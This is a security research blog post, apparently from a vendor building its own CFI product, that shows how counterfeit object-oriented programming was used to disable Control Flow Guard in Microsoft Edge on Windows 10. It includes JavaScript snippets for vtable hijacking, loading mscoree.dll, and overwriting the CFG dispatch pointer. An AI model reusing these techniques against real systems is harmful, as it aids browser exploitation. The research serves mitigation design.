Disarming Control Flow Guard Using Advanced Code Reuse Attacks

Advanced exploitation is moving away from ROP-based code-reuse attacks. Over the last two years, there has been a flurry of papers related to one novel code-reuse attack, Counterfeit Object-Oriented Programming (COOP). COOP represents a state of the art attack targeting forward-edge control-flow integrity (CFI), and caught our attention in 2016 as we were integrating our CFI solution (HA-CFI) into our endpoint product. COOP largely remains in academia, and has yet to show up in exploit kits. This may be because attackers migrate towards a path of least resistance. In the case of Microsoft Edge on Windows 10 Anniversary Update, protected by Control Flow Guard (CFG), that path of least resistance is the absence of backward-edge CFI. But what happens when Return Flow Guard (RFG) emerges and the attacker can no longer rely on corrupting a return address on the stack? 

We were curious to evaluate COOP against modern CFI implementations.  This not only is a useful exercise to keep us on top of cutting-edge research in academia and the hacking community, but it also allows us to measure the effectiveness, alter the design, or generally improve upon our own mitigations when necessary. This first of our two-part blog series covers our adventures evaluating COOP function-reuse attacks against Microsoft’s CFG and later our own HA-CFI. 

Microsoft Control Flow Guard

There have been a number of papers, blogs, and conference talks already discussing Microsoft’s Control Flow Guard (CFG) at length. Trail of Bits does an excellent job of comparing Clang CFI and Microsoft CFG in two recent posts. The first post focuses on Clang, the second emphasizes Microsoft’s implementation of CFI, while additional research provides further detail on the implementation of CFG. 

Bypassing CFG has also been a popular subject at security conferences the past few years. Before we cite some notable bypasses it is first important to note that CFI can be further broken down into two types: forward-edge and backward-edge.

  • Forward-Edge CFI: Protects indirect CALL or JMP sites. Forward-edge CFI solutions include Microsoft CFG and Endgame’s HA-CFI.
  • Backward-Edge CFI: Protects RET instructions. Backward-edge CFI solutions would include Microsoft Return Flow Guard, components of Endgame’s DBI exploit prevention, as well as other ROP detections including Intel’s CET

This categorization helps delineate what CFG is designed to protect – indirect call sites – and what it’s not meant to protect – the return stack. For instance, a recent POC ended up in exploit kits targeting Edge using a R/W primitive to modify a return address on the stack. This is not applicable to CFG, and should not be considered a weakness of CFG. If anything, it demonstrates CFG successfully pushing attackers to hijack control flow somewhere other than at indirect call sites. Examples that actually demonstrate flaws or limitations of CFG include: leveraging unprotected call sites, remapping read-only memory regions containing CFG code pointers and changing them to point to code that always passes a check, a race condition with the JIT encoder in Chakra, and using memory-based indirect calls. COOP or function-reuse attacks in general are an acknowledged limitation for some CFI implementations and noted as out-of-scope for Microsoft’s bypass bounty due to “limitations of coarse-grained CFI”. That said, we are not aware of any public domain POCs that demonstrate COOP to specifically attack CFG hardened binaries.  

CFG adds a __guard_fids_table to each protected DLL, composed of a list of RVAs of valid or sensitive targets for indirect call sites within the binary. An address is used as an index into a CFG bitmap, where bits can be toggled depending upon whether the address should be a valid destination. An API also exists to modify this bitmap, for example, to support JIT encoded pages: kernelbase!SetProcessValidCallTargets which invokes ntdll!SetInformationVirtualMemory before making the syscall to update the bitmap.

A new enhancement to CFG in Windows 10 Creators Update enables suppression of exports. In other words, exported functions can now be marked as invalid target addresses for CFG protected call sites. The implementation of this requires using a second bit for each address within the CFGBitmap, as well as a flags byte in the __guard_fids_table for each RVA entry when building the initial per process bitmap. 

For 64-bit systems, bits 9-63 of the address are used as an index to retrieve a qword from the CFG bitmap, and bits 3-10 of the address are used (modulo 64) to access a specific bit within the qword. With export suppression, the CFG permissions for a given address are represented by two bits in the CFG bitmap. Additionally, __guard_dispatch_icall_fptr in most DLLs is now set to point to ntdll!LdrpDispatchUserCallTargetES where a valid call target must omit ‘01’ from the CFG bitmap. 

Implementing this new export suppression feature becomes a bit complicated when you factor in dynamically resolving symbols, since using GetProcAddress implies subsequent code may invoke the return value as a function pointer. Control Flow Guard handles this by changing the corresponding two-bit entry in the CFG bitmap from ‘10’ (export suppressed) to ‘01’ (valid call site) as long as the entry was not previously marked as sensitive or not marked valid at all (e.g. VirtualProtect, SetProcessValidCallTargets, etc.). As a result, some exports will begin as invalid indirect call targets on process creation, but eventually become a valid call target due to code at runtime. This is important to remember later in our discussion. For reference, a sample call stack when this occurs looks as follows:

00 nt!NtSetInformationVirtualMemory

01 nt!setjmpex

02 ntdll!NtSetInformationVirtualMemory

03 ntdll!RtlpGuardGrantSuppressedCallAccess

04 ntdll!RtlGuardGrantSuppressedCallAccess

05 ntdll!LdrGetProcedureAddressForCaller

06 KERNELBASE!GetProcAddress

07 USER32!InitializeImmEntryTable

 

COOP Essentials

Schuster et al. identified counterfeit object-oriented programming (COOP) as a potential weakness to CFI implementations. The attack sequences together and reuses existing virtual functions in order to execute code while passing all forward-edge CFI checks along the way. In a similar manner to ROP, the result is a sequence of small valid functions that individually perform minimal computation (e.g. load a value into RDX), but when pieced together perform some larger task. A fundamental component of COOP is to leverage a main loop function, which might iterate over a linked-list or array of objects, invoking a virtual method on each object. The attacker is then able to piece together “counterfeit” objects in memory, in some cases overlapping the objects, such that the main loop will call valid virtual functions of the attacker’s choosing in a controlled order. Schuster et al. demonstrated the approach with COOP payloads targeting Internet Explorer 10 on Windows 7 32-bit and 64-bit, and Firefox on Linux 64-bit. The research was later extended, demonstrating that recursion or functions with many indirect call invocations could also be used instead of a loop, and extended yet again into targeting the Objective-C runtime. 

This prior research is extremely interesting and novel. We wanted to apply the concept to some modern CFI implementations to assess: a) the difficulty of crafting a COOP payload in a hardened browser; b) whether we could bypass CFG and HA-CFI; and c) whether we could improve our CFI to detect COOP style attacks. 

 

Our Target

Our primary target for COOP was Microsoft Edge on Windows 10, as it represents a fully hardened CFG application, and allows us to prepare our COOP payload in memory using JavaScript. While vulnerabilities are always of interest to our team, for this effort we focus on the hijack of control flow with CFI in place, and make the following assumptions as an attacker:

  1. An arbitrary read-write primitive is obtained from JavaScript.
  2. Hardcoded offsets are allowed, as dynamically finding gadgets at run-time is out of scope for this particular effort.
  3. All of Microsoft’s latest mitigations in Creators update are enabled (e.g. ACG, CIG, CFG with export suppression).
  4. The attacker must not bypass or avoid CFG in any way other than using COOP.

For our initial research, we leveraged a POC from Theori for Microsoft Edge on Windows 10 Anniversary update (OS build 14393.953). However, we designed our payload with Creators update mitigations in mind, and validated our final working COOP payload on Windows 10 Creators update (OS build 15063.138) with export suppression enabled.

An ideal POC would execute some attacker shellcode or launch an application. A classic code execution model for an attacker is to map some controlled data in memory as +X, and then jump to shellcode in that newly modified +X region. However, our real goal is to generate COOP payloads that execute something meaningful while protected by forward-edge CFI. Such a payload provides data points with which we can test and refine our own CFI algorithms. Further, attacking Arbitrary Code Guard (ACG) or the child process policy in Edge is slightly out of scope. We decided an acceptable end goal for our research on Windows 10 Creators Update was to use COOP to effectively disable CFG, opening up the ability to then jump or call any arbitrary location within a DLL. We thus ended up with two primary COOP payloads:

  1. For Windows 10 Anniversary Update, and a lack of ACG, our payload maps data we control as executable, and then jumps into that region of controlled shellcode after disabling CFG.
  2. For Windows 10 Creators Update, our end goal was to simply disarm CFG. 

 

Finding COOP Gadgets

Following the blueprint left by Schuster et al., our first order of business was to agree upon a terminology for the various components of COOP. The academic papers refer to each reused function as a virtual function gadget or vfgadget, and when describing each specific type of vfgadget an abbreviation is used such as ML-G for a main loop vfgadget. We opted to name each type of gadget in a more informal way. Terms you find in the remaining post are defined here:

  • Looper: the main loop gadget critical to executing complex COOP payloads (ML-G in paper)
  • Invoker: a vfgadget which invokes a function pointer (INV-G in paper)
  • Arg Populator: a virtual function which preps an argument, either loading a value into a register (LOAD-R64-G in paper), or moving the stack pointer and/or loading values on the stack (MOVE-SP-G in paper)

Similar to the paper, we wrote scripts to help us identify vfgadgets in a given binary. We utilized IDA Python, and logic helped us find loopers, invokers, and argument populators. In our research, we found that a practical approach to COOP is to chain together and execute a small number of vfgadgets at a time, before returning to JavaScript, repeating the process through additional COOP payloads as needed. For this reason, we did not find it necessary to lift binary code to IR for our purposes. However, to piece together an extremely large COOP payload, such as running a C2 socket thread all via reused code, it may require lifting to IR in order to piece together the desired assembly. For each subtype of vfgadget, we defined a list of rules that we used while conducting a search within two of the more fruitful binaries in Edge (chakra.dll and edgehtml.dll). A few of these rules for a looper vfgadget include:

  1. Function present on __guard_fids_table
  2. Contain a loop with exactly 1 indirect call taking 0 arguments
  3. Loop must not clobber argument registers

 

Of all the classes of vfgadgets, the search for loopers was the most time consuming. Many potential loopers have some restrictions that make it hard to work with. Our hunt for invokers turned up not only vfgadgets for invoking function pointers, but also many vfgadgets that can very quickly and easily populate up to six arguments at once all from a single counterfeit object. For this reason, there are shortcuts available for COOP when attempting to invoke a single API, which completely avoid requiring a loop or recursion, unless a return value is needed.  Numerous register populators were found for all argument registers on x64. It is worth mentioning that a number of the original vfgadgets proposed in the Schuster et al. COOP paper from mshtml can still be found in edgehtml. However, we added a requirement to our effort to avoid reusing any of these and instead find all new vfgadgets for our COOP payloads. 

 

COOP Payloads

By triggering COOP from a scripting language, we can actually move some complex tasking out of COOP, since chaining together everything at once can get complicated. We can use JavaScript to our advantage and repeatedly invoke miniature COOP payload sequences. This allows us to move things like arithmetic and conditional operations back to JavaScript, and leave the bare essential function reuse to prepping and invoking critical API’s via COOP. Further, we show an example of this methodology including passing return values from COOP back to JavaScript in our Hijack #1 section discussing how to invoke LoadLibrary. 

For brevity, I will only step through one of our simplest payloads. A common theme to all of our payloads is the requirement to invoke VirtualProtect. Since VirtualProtect and the eshims APIs are marked as sensitive and not a valid target for CFG, we have to use a wrapper function in Creators Update. As originally suggested by Thomas Garnier, a number of convenient wrappers can be found in .NET libraries mscoree.dll and mscories.dll such as UtilExecutionEngine::ClrVirtualProtect. Because Microsoft’s ACG prevents creating new executable memory, or changing existing executable memory to become writable, an alternate approach is required. Read-only memory can be remapped as writable with VirtualProtect, so I borrow the technique from a BlackHat 2015 presentation, and remap the page containing chakra!__guard_dispatch_icall_fptr as writable, then overwrite the function pointer to point to an arbitrary place in chakra.dll that contains a jmp rax instruction. In fact, there already exists a function in most DLLs, __guard_dispatch_icall_nop, which is exactly that – a single jmp rax instruction. As a result, I can effectively disable CFG since all protected call sites within chakra.dll will immediately just jump to the target address as if it passed all checks. Presumably one could take this a step further to explore function-reuse to attack ACG. To accomplish this mini-chain, the following is required:

  1. Load mscoree.dll into the Edge process
  2. Invoke ClrVirtualProtect +W on a read-only memory region of chakra.dll
  3. Overwrite __guard_dispatch_icall_fptr to always pass check

As seen from the list of vfgadgets above, edgehtml is an important library for COOP. Thus, the first order of business is to leak the base address for edgehtml as well as any other necessary components, such as our counterfeit memory region. This way the payload can contain hardcoded offsets to be rebased at runtime. Using the info leak bug in Theori’s POC, we can obtain all the base addresses we need. 

 

//OS Build 10.0.14393
var chakraBase = Read64(vtable).sub(0x274C40);
var guard_disp_icall_nop = chakraBase.add(0x273510);
var chakraCFG = chakraBase.add(0x5E2B78); //_guard_dispatch_icall...
var ntdllBase = Read64(chakraCFG).sub(0x95260);

//Find global CDocument object, VTable, and calculate EdgeHtmlBase
var [hi, lo] = PutDataAndGetAddr(document);
CDocPtr = Read64(newLong(lo + 0x30, hi, true));
EdgeHtmlBase = Read64(CDocPtr).sub(0xE80740);

//Rebase our COOP payload
rebaseOffsets(EdgeHtmlBase, chakraBase, ntdllBase, pRebasedCOOP);

 

Triggering COOP

A key part of using COOP is the initial transition from JavaScript into a looper function. Using our assumed R/W primitive, we can easily hijack a vtable in chakra to point to our looper, but how do we ensure the looper then begins iterating over our counterfeit data? For that answer we need to evaluate the looper, which I chose as CTravelLog::UpdateScreenshotStream: 

 

Notice in the first block before the loop, the code is retrieving a pointer to a linked list at this + 0x30h. In order to properly kick off the looper, we must both hijack a JavaScript object’s vtable to include the address to our looper, and then place a pointer at object + 0x30 to point to the start of our counterfeit object list. The actual counterfeit object data can be defined and rebased entirely in JavaScript. Also notice the loop is iterating over a list with a next pointer at object + 0x80h. This is important when crafting our counterfeit object stream. Additionally, notice the vtable offset for this indirect call site is +0xF8h. Any fake vtable in our counterfeit objects must all point to the address of the desired function pointer minus 0xF8h, which often will be in the middle of some neighboring vtable. To kickoff our COOP payload, I chose to hijack a JavascriptNativeIntArray object and will specifically override the freeze() and seal() virtual functions as follows. 

var hijackedObj = new Array(0);

[hi, lo] = PutDataAndGetAddr(hijackedObj);

var objAddr = new Long(lo, hi, true);

Write64(objAddr.add(0x30), pRebasedCOOP);

Write64(objAddr, pFakeVTable);

Object.seal(hijackedObj); //Trigger initial looper

 

 

Hijack #1: Invoking LoadLibrary

As previously stated, my end goal was bypassing CFG on Edge on Win10 Creators update with export suppression enabled. Looking at the various LoadLibrary calls exported in kernel32 and kernelbase, it turns out loading a new DLL into our process is rather easy even with the latest CFG feature in place. The reason for this is two-fold. First, LoadLibraryExW is actually marked as a valid call target in the __guard_fids_table within kernel32.dll. 

 

 

Second, the rest of the LoadLibrary calls within both kernel32 and kernelbase start out as suppressed, but in Edge they eventually become valid call sites. This appears to stem from some delayed loading in MicrosoftEdgeCP!_delayLoadHelper2, which eventually results in GetProcAddr being called on the LoadLibraryX APIs. As foreshadowed earlier, this demonstrates the difficulty of making all function exports invalid call targets. Even if these other LoadLibrary call gates remained suppressed or were only opened temporarily, for our purposes we can just use kernel32!LoadLibraryExW since it’s initialized as a valid target.

To get our desired VirtualProtect wrapper loaded into the Edge process, we need to invoke LoadLibraryExW(“mscoree.dll”, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32). We could cut corners here, and leverage one of the aforementioned invokers to populate all of our parameters at once, but instead let’s create a traditional COOP payload using a looper vfgadget to iterate over four counterfeit objects. 

 

Our first iteration will populate r8d with 0x800. CHTMLEditor::IgnoreGlyphs is a nice vfgadget to populate r8d as seen in the assembly below. Our parameter 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) will be loaded from this + 0xD8h. Recall that the next pointer in our counterfeit objects must be at +0x80h. We could create four contiguous counterfeit objects in memory to each be of size greater than 0xD8h, or we could treat the next pointer to be located at the end of our object. I chose the latter.  In this case, we will have an overlapping object so we must be careful that the offset of this + 0xD8 does not interfere with the vfgadget from our second iteration that operates on the second object in memory. The first counterfeit object for populating r8d looks as follows: 

 

 

Upon return from this vfgadget, the looper then iterates over our fake linked list and must now invoke another vfgadget this time to populate rdx with a value of 0x0 (NULL). To achieve this I use Tree::ComputedRunTypeEnumLayout::BidiRunBox::RunType(). We can load our value (0x0) from our counterfeit object + 0x28h.

 

 

Now that we have populated parameters 2 and 3 for our API call, we need to populate the first argument, a pointer to our ‘mscoree.dll’ string, and then invoke a function pointer to LoadLibraryExW. A perfect invoker vfgadget exists for this purpose, Microsoft::WRL::Details::InvokeHelper::Invoke(). The assembly and corresponding third counterfeit object are as follows: 

 

 

Now that LoadLibraryExW has been called, and hopefully mscoree.dll loaded into our process, we need to get the return address back to JavaScript to rebase additional COOP payloads. Both the looper and CFG make use of RAX for the indirect branch target, so we need to find another way to get the virtual address for the newly loaded module back to JavaScript. Fortunately, upon exiting LoadLibraryExW, RDX also contains a copy of the module address. Therefore, we can tack on one final vfgadget to our object list in order to move RDX back into our counterfeit object memory region. For the final iteration of our loop, we will invoke CBindingURLBlockFilter::SetFilterNotify(), which will copy RDX into the address of our current counterfeit object – 0x88h.

 

 

The looper then reaches the end of our list, and returns from the hijacked seal() call transferring control back to our JavaScript code. The first COOP payload has completed, mscoree.dll has been loaded into Edge, and we can now retrieve the base address for mscoree from JavaScript in the code snippet below.  

//Retrieve loadlibrary return val from coop region

var mscoreebase = Read64(pRebasedCOOP.add(0x128));

alert("mscoree.dll loaded at: 0x" + mscoreebase.toString(16));

 

Hijack #2: Invoking VirtualProtect Wrapper

Having successfully completed our first COOP payload, we can now rebase a second COOP payload to invoke ClrVirtualProtect on the read-only memory region that contains chakra!__guard_dispatch_icall_fptr in order to make it writable. Our objective is to call ClrVirtualProtect(this, chakraPageAddress,0x1000,PAGE_READWRITE,pScratchMemory). This time we will demonstrate a COOP payload that does not make use of a loop or recursion by using a single counterfeit object to populate all arguments and invoke a function pointer. We’ll  use the same invoker vfgadget as before, only this time it is primarily used to move a counterfeit object into rcx. 

 

 

We hijack the freeze() virtual method from our original JavascriptNativeIntArray to point to Microsoft::WRL::Details::InvokeHelper::Invoke. This vfgadget will move the this pointer based on the address at this + 0x10, and it will treat this+0x18h as a function pointer. Thus, from our R/W primitive in JavaScript, in addition to hijacking the vtable to call this invoker trampoline function, we also need to overwrite the values of the object + 0x10 and + 0x18.

Write64(objAddr.add(0x10), pCOOPMem2);

Write64(objAddr.add(0x18), EdgeHtmlBase.add(0x2DC540));

Object.freeze(objAddr);

 

Notice that our fake object will load all the required parameters for ClrVirtualProtect, as well as populate the address of ClrVirtualProtect into rax by resolving index +0x100h from another fake vtable. Upon completion, this will map the desired page in chakra.dll to be writable. 

 

 

At this point we are done with COOP, and our last step is to actually disarm CFG for chakra.dll. We can pick any arbitrary address in chakra.dll that contains the instruction jmp rax. Once this is identified, we use our write primitive from JavaScript to overwrite the function pointer for chakra!__guard_dispatch_icall_fptr to point to this address. This has the effect of NOPing the CFG validation routine, and allows us to hijack a chakra vtable from JavaScript to jump anywhere. 

//Change chakra CFG pointer to NOP check

Write64(chakraCFG, guard_disp_icall_nop);

//trigger  hijack to 0x4141414141414141

Object.isFrozen(hijackedObj);

As the WinDbg output below illustrates, with CFG now disabled our hijack was successful and the process crashes when trying to jump to the unmapped address 0x4141414141414141. It’s important to point out that we could have made this hijack jump to anywhere in the process address space due to CFG being disabled. By comparison, with CFG in place an exception would have been thrown since 0x4141414141414141 is not valid in the bitmap, and we would have seen the original CFG routine that we swapped out, ntdll!LdrpDispatchUserCallTargetES, in our call stack.

 

 

Conclusion

In this post, I discussed COOP, a novel code-reuse attack proposed in academia, and demonstrated how it can be used to attack modern Control-Flow Integrity implementations, such as Microsoft CFG. Overall, COOP is fairly easy to work with, particularly when breaking up payloads into smaller chains. Piecing together vfgadgets is not unlike the exercise of assembling ROP gadgets. Perhaps the most time consuming portion is finding and labeling candidate vfgadgets of various types within your target process space.

Microsoft’s Control Flow Guard is considered a coarse-grained CFI implementation and is thus more vulnerable to function reuse attacks such as described here. By comparison, fine-grained CFI solutions are able to validate call sites beyond just the target address considering elements such as expected VTable type, validating number of arguments, or even argument types, for a given indirect call. A key tradeoff between the two approaches is performance, as introducing too much complexity into a CFI policy can add significant overhead. Nonetheless, mitigating advanced code-reuse attacks is important moving forward as applications become hardened with some form of forward-edge and backward-edge CFI.

To offset some of the limitations of CFG, Microsoft appears to be focused on diversifying its preventions such as protecting critical call gates like VirtualProtect with export suppression in CFG and Arbitrary Code Guard. However, one important takeaway from this post should be the challenges of designing and enforcing mitigations from user-space. As we saw with EMET a couple of years ago, researchers were able to disarm EMET by reusing code inserted by EMET itself. Further, as was originally demonstrated at BlackHat 2015, here we are similarly taking advantage of critical CFG function pointers residing in user-space to alter the behavior of CFG.

By comparison, Endgame’s HA-CFI solution is implemented and enforced entirely from the kernel and uses hardware features that even if vulnerable to function reuse attacks, make it more difficult to tamper with because of the privilege separation. In the second part of this series, I will discuss the COOP adventures with our own HA-CFI and ongoing research, and how our detection logic evolves to account for advanced function reuse attacks.